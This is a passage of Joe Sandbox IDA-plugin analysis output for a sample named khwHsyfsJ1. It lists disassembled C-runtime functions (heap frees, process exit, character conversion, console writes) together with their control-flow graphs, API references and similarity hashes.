                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731B3759012189BCB21DF68D989B8DBBF8FF08311F5045EAE41CA7250EB749B858F45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000,?,00B63F66,00000003,00B6209F,00B61AFC), ref: 00B63698
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00B6364D,?,00B702E0,0000000C,00B637A4,?,00000002,00000000,?,00B63F66,00000003,00B6209F,00B61AFC), ref: 00B6369F
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00B636B1
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: d07978732b8b76904f442a7d59b0fe93fdc3008bb2a1a63add8bc6ca14d49b61
                                                                                                                                                                                                                                                          • Instruction ID: 4d1f59e45b60ef8a94c88c28ad88e89f7bcb2aa571d3796ddb1f45ea92e701a8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d07978732b8b76904f442a7d59b0fe93fdc3008bb2a1a63add8bc6ca14d49b61
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4E09232014548ABCF21AF54DE09E5A3FA9EB40745B044094FA599B271DF7DDA92CA50
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B6A490,?,?,00000008,?,?,00B6A130,00000000), ref: 00B6A6C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B61BEA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00B61300), ref: 00B61AB1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00B6654B
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66095
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660A7
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660B9
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660CB
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660DD
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B660EF
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66101
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66113
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66125
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66137
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B66149
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B6615B
                                                                                                                                                                                                                                                            • Part of subcall function 00B66078: _free.LIBCMT ref: 00B6616D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66540
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66562
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66577
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66582
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665A4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665C5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B665D0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66608
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6660F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6662C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66644
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: c7c20aff9c3f31a2a5acd5f19455da59379b0c4cfa96a976b91d7f07df4435a5
                                                                                                                                                                                                                                                          • Instruction ID: dc7a58b89b61a7cd2bf07843c0399bcf46f8539aa6243bf961939f8453b72764
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c20aff9c3f31a2a5acd5f19455da59379b0c4cfa96a976b91d7f07df4435a5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4314B71600604DFEB60AB7AE846B9AB7E8EF50310F1448BAF45AD7191DF38ED40CB60

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 138 b64330-b64341 139 b64343-b6434c call b64869 138->139 140 b6434d-b643d8 call b64869 * 9 call b641f6 call b64246 138->140 139->140
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64344
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64350
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6435B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64366
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64371
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6437C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64387
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B64392
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6439D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B643AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 5a2f5de688e3072a9a3f6c608ddfcd0d4610201899b2062dda042b6a1f929143
                                                                                                                                                                                                                                                          • Instruction ID: e07964c54e6588d0192e71b8ff47f426d828e61d8f3fce8e78827b5a68e5050a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2f5de688e3072a9a3f6c608ddfcd0d4610201899b2062dda042b6a1f929143
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3117476610548EFCB41EF96D842CD93BA5EF44750F5141A6BA088F262DB35DE509B80

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 165 b67ab4-b67acd 166 b67ae3-b67ae8 165->166 167 b67acf-b67adf call b682cc 165->167 169 b67af5-b67b19 MultiByteToWideChar 166->169 170 b67aea-b67af2 166->170 167->166 174 b67ae1 167->174 172 b67b1f-b67b2b 169->172 173 b67cac-b67cbf call b6123a 169->173 170->169 175 b67b7f 172->175 176 b67b2d-b67b3e 172->176 174->166 178 b67b81-b67b83 175->178 179 b67b40-b67b4f call b6ac20 176->179 180 b67b5d-b67b63 176->180 183 b67ca1 178->183 184 b67b89-b67b9c MultiByteToWideChar 178->184 179->183 190 b67b55-b67b5b 179->190 182 b67b64 call b662ff 180->182 186 b67b69-b67b6e 182->186 188 b67ca3-b67caa call b6646a 183->188 184->183 187 b67ba2-b67bbd call b65a15 184->187 186->183 191 b67b74 186->191 187->183 197 b67bc3-b67bca 187->197 188->173 194 b67b7a-b67b7d 190->194 191->194 194->178 198 b67c04-b67c10 197->198 199 b67bcc-b67bd1 197->199 200 b67c12-b67c23 198->200 201 b67c5c 198->201 199->188 202 b67bd7-b67bd9 199->202 203 b67c25-b67c34 call b6ac20 200->203 204 b67c3e-b67c44 200->204 205 b67c5e-b67c60 201->205 202->183 206 b67bdf-b67bf9 call b65a15 202->206 208 b67c9a-b67ca0 call b6646a 203->208 220 b67c36-b67c3c 203->220 211 b67c45 call b662ff 204->211 207 b67c62-b67c7b call b65a15 205->207 205->208 206->188 218 b67bff 206->218 207->208 222 b67c7d-b67c84 207->222 208->183 216 b67c4a-b67c4f 211->216 216->208 221 b67c51 216->221 218->183 223 b67c57-b67c5a 220->223 221->223 224 b67c86-b67c87 222->224 225 b67cc0-b67cc6 222->225 223->205 226 b67c88-b67c98 WideCharToMultiByte 224->226 225->226 226->208 227 b67cc8-b67ccf call b6646a 226->227 227->188
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00B654C8,00000000,?,?,?,00B67D05,?,?,00000100), ref: 00B67B0E
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B67B46
                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00B67D05,?,?,00000100,5EFC4D8B,?,?), ref: 00B67B94
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00B67C2B
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B67C8E
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67C9B
                                                                                                                                                                                                                                                            • Part of subcall function 00B662FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00B67E5B,?,00000000,?,00B6686F,?,00000004,00000000,?,?,?,00B63BCD), ref: 00B66331
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67CA4
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00B67CC9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2597970681-0
                                                                                                                                                                                                                                                          • Opcode ID: e2078988a1d8f367522d0ef911eeb63067f6ed35200e12954fc017c36a19a7be
                                                                                                                                                                                                                                                          • Instruction ID: 72ba268eb0d0237529305f777c69793e902787f8a6bb2ea07f3f9a41be1eaddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2078988a1d8f367522d0ef911eeb63067f6ed35200e12954fc017c36a19a7be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF51DF72654216ABEB258F64CC91EAF77EAEB84758F1546A8FC04D6140EF38DC80D6A0

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 230 b68417-b68474 GetConsoleCP 231 b685b7-b685c9 call b6123a 230->231 232 b6847a-b68496 230->232 234 b684b1-b684c2 call b66052 232->234 235 b68498-b684af 232->235 241 b684c4-b684c7 234->241 242 b684e8-b684ea 234->242 237 b684eb-b684fa call b672b7 235->237 237->231 246 b68500-b68520 WideCharToMultiByte 237->246 244 b6858e-b685ad 241->244 245 b684cd-b684df call b672b7 241->245 242->237 244->231 245->231 252 b684e5-b684e6 245->252 246->231 248 b68526-b6853c WriteFile 246->248 250 b6853e-b6854f 248->250 251 b685af-b685b5 GetLastError 248->251 250->231 253 b68551-b68555 250->253 251->231 252->246 254 b68557-b68575 WriteFile 253->254 255 b68583-b68586 253->255 254->251 257 b68577-b6857b 254->257 255->232 256 b6858c 255->256 256->231 257->231 258 b6857d-b68580 257->258 258->255
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B68B8C,?,00000000,?,00000000,00000000), ref: 00B68459
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00B684D4
                                                                                                                                                                                                                                                          • __fassign.LIBCMT ref: 00B684EF
                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B68515
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,00B68B8C,00000000,?,?,?,?,?,?,?,?,?,00B68B8C,?), ref: 00B68534
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00B68B8C,00000000,?,?,?,?,?,?,?,?,?,00B68B8C,?), ref: 00B6856D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                                          • Opcode ID: 04267ff3652b3def17fea4d04b6561271629923f063b1cee9c6266c08b97e625
                                                                                                                                                                                                                                                          • Instruction ID: f7b43b9757df3aabe606ed4863a4ebc7eb63451b3826f9f99ad2fce41856a7c2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04267ff3652b3def17fea4d04b6561271629923f063b1cee9c6266c08b97e625
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F51B470A002499FDB10CFA8DC95AEEBBF8FF19300F14465AE956E7291DB749941CF60

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 259 b61e00-b61e51 call b6ac80 call b61dc0 call b62377 266 b61e53-b61e65 259->266 267 b61ead-b61eb0 259->267 268 b61e67-b61e7e 266->268 269 b61ed0-b61ed9 266->269 267->269 270 b61eb2-b61ebf call b62360 267->270 271 b61e94 268->271 272 b61e80-b61e8e call b62300 268->272 276 b61ec4-b61ecd call b61dc0 270->276 275 b61e97-b61e9c 271->275 281 b61ea4-b61eab 272->281 282 b61e90 272->282 275->268 279 b61e9e-b61ea0 275->279 276->269 279->269 283 b61ea2 279->283 281->276 284 b61e92 282->284 285 b61eda-b61ee3 282->285 283->276 284->275 286 b61ee5-b61eec 285->286 287 b61f1d-b61f2d call b62340 285->287 286->287 288 b61eee-b61efd call b6aac0 286->288 292 b61f41-b61f5d call b61dc0 call b62320 287->292 293 b61f2f-b61f3e call b62360 287->293 297 b61eff-b61f17 288->297 298 b61f1a 288->298 293->292 297->298 298->287
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61E37
                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B61E3F
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61EC8
                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00B61EF3
                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00B61F48
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                          • Opcode ID: e7f30bbc3e0cc8c0c5afbf75f3d58855a9eabff858196f8e3ce73b2250909050
                                                                                                                                                                                                                                                          • Instruction ID: d2d4f7e5204874fa7c4c07c0b3f4866b7e304fc0685caae150a8a5d231801be0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f30bbc3e0cc8c0c5afbf75f3d58855a9eabff858196f8e3ce73b2250909050
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E418134A00208ABCF10DF6CC885A9EBBF5FF45354F1888D5E819AB392D73AD945CB91

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 305 b6621b-b66226 306 b662fc-b662fe 305->306 307 b6622c-b662f9 call b661df * 5 call b64869 * 3 call b661df * 5 call b64869 * 4 305->307 307->306
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00B661DF: _free.LIBCMT ref: 00B66208
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66269
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: HeapFree.KERNEL32(00000000,00000000,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?), ref: 00B6487F
                                                                                                                                                                                                                                                            • Part of subcall function 00B64869: GetLastError.KERNEL32(?,?,00B6620D,?,00000000,?,00000000,?,00B66234,?,00000007,?,?,00B6669F,?,?), ref: 00B64891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B66274
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B6627F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662D3
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662DE
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662E9
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00B662F4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                          • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction ID: 9a46592c195d55423195785a3011537ad13a2fb9b253f2c1e1cc56c978c31f4d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9115E71541B14EAD620BBB1CC07FCB77DCAF81700F404865B6AAB6093EB7DBE048690

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          control_flow_graph 342 b623d1-b623d8 343 b623dd-b623f8 GetLastError call b626a4 342->343 344 b623da-b623dc 342->344 347 b62411-b62413 343->347 348 b623fa-b623fc 343->348 349 b62457-b62462 SetLastError 347->349 348->349 350 b623fe-b6240f call b626df 348->350 350->347 353 b62415-b62425 call b63f67 350->353 356 b62427-b62437 call b626df 353->356 357 b62439-b62449 call b626df 353->357 356->357 362 b6244b-b6244d 356->362 363 b6244f-b62456 call b63ec5 357->363 362->363 363->349
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00B623C8,00B6209F,00B61AFC), ref: 00B623DF
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B623ED
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B62406
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00B623C8,00B6209F,00B61AFC), ref: 00B62458
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
